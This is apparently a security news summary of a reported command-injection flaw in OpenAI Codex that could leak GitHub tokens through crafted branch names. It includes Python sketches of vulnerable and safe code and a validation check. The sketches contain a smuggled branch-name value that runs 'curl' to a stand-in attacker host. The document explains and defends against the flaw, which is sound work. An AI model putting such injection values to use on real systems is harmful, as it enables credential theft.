OpenAI Codex Exposes GitHub Tokens Via Command Injection

Phantom Labs, the research arm of BeyondTrust, reported on March 30, 2026, that a command-injection vulnerability in OpenAI’s Codex could expose short-lived GitHub OAuth tokens by manipulating branch names during task creation. The flaw affected the Codex web UI, CLI, SDK, and IDE integrations, and could be exploited at scale across repositories; OpenAI has deployed fixes, including input validation, stronger shell escaping, and reduced token scope and lifetime.
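To illustrate the reported flaw class (not OpenAI's actual code, which has not been published), the sketch below shows how an attacker-chosen branch name interpolated into a shell command string can smuggle in extra commands, and how quoting or an argument vector defuses it. The branch name and exfiltration URL are hypothetical.

```python
import shlex

# Hypothetical attacker-controlled branch name containing shell metacharacters.
malicious_branch = 'main"; curl https://attacker.example/steal; echo "'

def build_checkout_unsafe(branch: str) -> str:
    # VULNERABLE sketch: interpolating an untrusted branch name into a shell
    # string lets metacharacters (";  |  $()) terminate the quoted argument
    # and run additional commands.
    return f'git checkout "{branch}"'

def build_checkout_safe(branch: str) -> str:
    # Mitigation sketch: shlex.quote() renders the name inert to the shell.
    # Passing an argument list to subprocess.run with shell=False is safer still.
    return f"git checkout -- {shlex.quote(branch)}"

print(build_checkout_unsafe(malicious_branch))
print(build_checkout_safe(malicious_branch))
```

The unsafe variant yields a command line containing a second `curl` command; the safe variant wraps the whole name in single quotes so git receives it as one literal argument.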
Scoring Rationale
This is a high-impact security disclosure with official fixes from OpenAI and broad enterprise implications, which boosts its credibility and scope. The score is reduced slightly for limited technical proof-of-concept detail and because mitigations have already been deployed, though practitioners must still act on input validation and token policies.
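On the input-validation side, a common defense is to reject suspicious branch names outright rather than try to escape them. The allowlist below is a hypothetical policy sketch, not the validation OpenAI deployed; real git ref rules are broader (see `git check-ref-format`).

```python
import re

# Hypothetical allowlist: permit only conservative branch-name characters
# (letters, digits, '/', '.', '_', '-'). Anything else is rejected.
_BRANCH_RE = re.compile(r"^[A-Za-z0-9._/-]+$")

def is_safe_branch_name(name: str) -> bool:
    # Reject shell metacharacters outright, and reject a leading '-' so the
    # name cannot be parsed as a command-line option by git.
    return bool(_BRANCH_RE.fullmatch(name)) and not name.startswith("-")

print(is_safe_branch_name("feature/login-fix"))    # benign name is accepted
print(is_safe_branch_name('main"; curl evil.sh'))  # injection attempt is rejected
```

Pairing such an allowlist with short-lived, narrowly scoped tokens, as the fixes described above do, limits both the injection surface and the blast radius if a token does leak.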
Sources
- OpenAI Codex vulnerability enabled GitHub token theft via command injection, report finds (siliconangle.com)

